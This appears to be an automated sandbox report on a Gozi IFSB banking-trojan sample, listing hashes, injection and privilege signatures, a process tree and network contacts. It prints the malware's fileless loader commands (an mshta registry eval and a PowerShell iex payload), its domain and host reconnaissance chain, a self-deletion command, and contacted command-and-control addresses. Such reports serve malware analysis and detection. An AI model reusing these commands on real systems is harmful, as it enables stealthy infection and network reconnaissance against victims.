C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 2d689ad6fef531e6d1dfe4e187c1f8f6
SHA1 8180b175fb9c6582ea68a08ba4328634f80a643a
SHA256 c58bfeebfdbdf4c65a4d89c6ef52e60c2a6d423a647adc334833684942196e62
SHA512 4b500b21477cdde8245f467ac91dce90ff1c33a24a55d0b668636b7df23adddc0d1f1d9683ad4e10e77feb8c33ed5191669a29c4d531e732c3e0afa15b943dbb

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 caa8caa0a4281f4c4ea04bf0ab032dbe
SHA1 b087a92f7579896ee5641a53ecf1180c4622c6bf
SHA256 4ecfe3f615314e62111fcfe0f6f134048b0a099795610cae826fd7c0f48b1f4e
SHA512 8084dd197726dc159f34db8d756ce6295a7c53a72782567ac5907152a992db2d3021124179e7fcd8b7c9b7df65536e32f9be1540a610a965406a2153b66fc201

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 caa8caa0a4281f4c4ea04bf0ab032dbe
SHA1 b087a92f7579896ee5641a53ecf1180c4622c6bf
SHA256 4ecfe3f615314e62111fcfe0f6f134048b0a099795610cae826fd7c0f48b1f4e
SHA512 8084dd197726dc159f34db8d756ce6295a7c53a72782567ac5907152a992db2d3021124179e7fcd8b7c9b7df65536e32f9be1540a610a965406a2153b66fc201

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 e761b4e3337c16268c826fd35e81725a
SHA1 ee0f5520e87770cb332a332b61395e4cbea83b08
SHA256 2ddfa8e7f315d5d3689bd61b188309e9230fcaea89906b80c82bee9bc060bdb3
SHA512 5dc9ddae8e9b78db15ea86a8e4ca4d80b00e250bb175df92bf82ce9c581a11af1fefc501a458cd9b474cce463a3515ef6d6f8d9a888179ee1f5dc64b2f868b96

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 e761b4e3337c16268c826fd35e81725a
SHA1 ee0f5520e87770cb332a332b61395e4cbea83b08
SHA256 2ddfa8e7f315d5d3689bd61b188309e9230fcaea89906b80c82bee9bc060bdb3
SHA512 5dc9ddae8e9b78db15ea86a8e4ca4d80b00e250bb175df92bf82ce9c581a11af1fefc501a458cd9b474cce463a3515ef6d6f8d9a888179ee1f5dc64b2f868b96

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 5161e2a962f078ef8ac8b55afebe01e1
SHA1 c3aa0438da514c51b9e4baabcf73c34aa350da93
SHA256 aa7a60885486cd82350a77733fb33508745127eff517f3112e3fd3918c46a1df
SHA512 b8c0a9dd44a687db88e7eb3ba99d1d364aa1631ad30f2815b5d9044880ede3ff9450ac8ed6165722a0ff5bb59411c83fd6ff9edaa3ff4b1f53eef6a4222e9c49

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 5161e2a962f078ef8ac8b55afebe01e1
SHA1 c3aa0438da514c51b9e4baabcf73c34aa350da93
SHA256 aa7a60885486cd82350a77733fb33508745127eff517f3112e3fd3918c46a1df
SHA512 b8c0a9dd44a687db88e7eb3ba99d1d364aa1631ad30f2815b5d9044880ede3ff9450ac8ed6165722a0ff5bb59411c83fd6ff9edaa3ff4b1f53eef6a4222e9c49

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 992623c36cb153e5b75afd3161a1b3d6
SHA1 f2c3d21ee43b85fbb076ea590fbbc52d7d11a845
SHA256 60b88997b32b2b8e8b9dc920b0964baf08ed07a903574f7a5872f0432066bb52
SHA512 2c08799c252fb31b5b316afcf19026331d5663e2b5bac664f1e1504262d13551343f73edb51ad0102e3c197eeba51999031affa0d3ac5628788a2bd3bbb85e14

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 992623c36cb153e5b75afd3161a1b3d6
SHA1 f2c3d21ee43b85fbb076ea590fbbc52d7d11a845
SHA256 60b88997b32b2b8e8b9dc920b0964baf08ed07a903574f7a5872f0432066bb52
SHA512 2c08799c252fb31b5b316afcf19026331d5663e2b5bac664f1e1504262d13551343f73edb51ad0102e3c197eeba51999031affa0d3ac5628788a2bd3bbb85e14

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 766ff9c99171ebf938ce8d3a17ac1fe5
SHA1 30e12b883b152f9d77bf273f38b200fb622f3a9d
SHA256 3ba2453407c06d1fb6f7b5d2c1d5745d3ca25be086da929dd6d2f66ccc5b12c2
SHA512 ca526a7e7f751a88d389a4f1ef3680bd3391e619120edf81f5a83747191b5229e3afb53d21417bf93a683f827f208013b4516270e9b585862ff46742a9822ea5

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 3a3202748358acc455e7bdee47cc4f06
SHA1 378db81921e78e5d18ddb2ff2056ca5907e7db7e
SHA256 d55d6a83c8aadbd4c21232a792d6e8c6911b71d9e2b49ef2125c74b66d1e2344
SHA512 260c3f6f72492cec27d72ce9e1695d801fefccdc62388c1041171fe539db3cf08bf2e7eda602178ddafef27ff93595b2f7f65617642f1492405e7bc7a84eb2e9

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 4a0fd412bd5a4903526e164cc50733e0
SHA1 9ef4def111c2d9953a18f072fadeb8a58e10f045
SHA256 c5025db53067a1cf22946f28df5eda642aad04fc8165617896c35e17dbb3532e
SHA512 726ab97eb318442b382559f5e61d589368ce259cfa342a27c928cb70f4841809d2cfedb18c50719a4ec0b3db0dca7ff7d35050052fa3d2d2927f727e25072248

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 4a0fd412bd5a4903526e164cc50733e0
SHA1 9ef4def111c2d9953a18f072fadeb8a58e10f045
SHA256 c5025db53067a1cf22946f28df5eda642aad04fc8165617896c35e17dbb3532e
SHA512 726ab97eb318442b382559f5e61d589368ce259cfa342a27c928cb70f4841809d2cfedb18c50719a4ec0b3db0dca7ff7d35050052fa3d2d2927f727e25072248

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 f289ecb66ce7d70db5db77c1d5082afb
SHA1 e9f9cb5049e3546cfee5817b99a0c2157e875fb4
SHA256 a5e5ec5592feefc624be602b27b3aa553700e4e4a14437ed66cc033674a45b17
SHA512 ba047670bf5d09e0a99b01561a4331ec865227430180db67f4c62ddd0f8197fd8cb0cd28d0aecbfb81b12db382b5498050622431b7c292c245cef60d3c37a368

C:\Users\Admin\AppData\Local\Temp\4868.bin1

MD5 f289ecb66ce7d70db5db77c1d5082afb
SHA1 e9f9cb5049e3546cfee5817b99a0c2157e875fb4
SHA256 a5e5ec5592feefc624be602b27b3aa553700e4e4a14437ed66cc033674a45b17
SHA512 ba047670bf5d09e0a99b01561a4331ec865227430180db67f4c62ddd0f8197fd8cb0cd28d0aecbfb81b12db382b5498050622431b7c292c245cef60d3c37a368

C:\Users\Admin\AppData\Local\Temp\4868.bin

MD5 f289ecb66ce7d70db5db77c1d5082afb
SHA1 e9f9cb5049e3546cfee5817b99a0c2157e875fb4
SHA256 a5e5ec5592feefc624be602b27b3aa553700e4e4a14437ed66cc033674a45b17
SHA512 ba047670bf5d09e0a99b01561a4331ec865227430180db67f4c62ddd0f8197fd8cb0cd28d0aecbfb81b12db382b5498050622431b7c292c245cef60d3c37a368

Analysis: behavioral2

Detonation Overview

Submitted

2022-01-24 10:09

Reported

2022-01-24 10:11

Platform

win10-en-20211208

Max time kernel

151s

Max time network

124s

Command Line

C:\Windows\System32\RuntimeBroker.exe -Embedding

Signatures

Gozi, Gozi IFSB

banker trojan gozi_ifsb

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3008 set thread context of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 set thread context of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 set thread context of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2304 set thread context of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3020 set thread context of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 set thread context of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe

Enumerates physical storage devices

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3804 wrote to memory of 3140 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3804 wrote to memory of 3140 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3804 wrote to memory of 3140 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3728 wrote to memory of 3008 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3728 wrote to memory of 3008 N/A C:\Windows\System32\mshta.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3008 wrote to memory of 1224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3008 wrote to memory of 1224 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1224 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1224 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3008 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3008 wrote to memory of 4028 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 4028 wrote to memory of 1252 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 4028 wrote to memory of 1252 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3008 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Explorer.EXE
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 2304 N/A C:\Windows\Explorer.EXE C:\Windows\System32\cmd.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 3020 wrote to memory of 3492 N/A C:\Windows\Explorer.EXE C:\Windows\System32\RuntimeBroker.exe
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2304 wrote to memory of 1928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 3020 wrote to memory of 3260 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 3260 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3260 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3260 wrote to memory of 2816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 3020 wrote to memory of 2892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2892 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2028 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 2028 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 2028 wrote to memory of 1972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\systeminfo.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 1576 N/A C:\Windows\Explorer.EXE C:\Program Files\Windows Mail\WinMail.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 3204 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\cmd.exe
PID 3020 wrote to memory of 1748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1748 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 756 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 756 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 756 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3020 wrote to memory of 1792 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 1792 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2676 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 3020 wrote to memory of 2676 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2676 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe
PID 2676 wrote to memory of 436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\nslookup.exe

Processes

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp" "c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp" "c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"

C:\Windows\system32\PING.EXE

ping localhost -n 5

C:\Windows\system32\cmd.exe

cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"

C:\Windows\system32\nslookup.exe

nslookup myip.opendns.com resolver1.opendns.com

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"

C:\Windows\system32\cmd.exe

cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Program Files\Windows Mail\WinMail.exe

"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE

C:\Windows\system32\systeminfo.exe

systeminfo.exe

C:\Windows\syswow64\cmd.exe

"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net view

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\nslookup.exe

nslookup 127.0.0.1

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\tasklist.exe

tasklist.exe /SVC

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\driverquery.exe

driverquery.exe

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\reg.exe

reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net config workstation

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 config workstation

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\nltest.exe

nltest /domain_trusts /all_trusts

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net view /all /domain

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\net.exe

net view /all

C:\Windows\system32\cmd.exe

cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"

C:\Windows\system32\cmd.exe

cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 giporedtrip.at udp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
US 8.8.8.8:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
US 208.67.222.222:53 resolver1.opendns.com udp
RU 45.9.20.190:80 45.9.20.190 tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 1.0.0.127.in-addr.arpa udp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp
KW 37.34.176.37:80 giporedtrip.at tcp

Files

memory/3140-115-0x00000000049C0000-0x00000000049D0000-memory.dmp

memory/3140-116-0x0000000074160000-0x000000007417C000-memory.dmp

memory/3008-126-0x0000014DF37B0000-0x0000014DF37D2000-memory.dmp

memory/3008-131-0x0000014DF3800000-0x0000014DF3802000-memory.dmp

memory/3008-132-0x0000014DF3803000-0x0000014DF3805000-memory.dmp

memory/3008-133-0x0000014DF43E0000-0x0000014DF4456000-memory.dmp

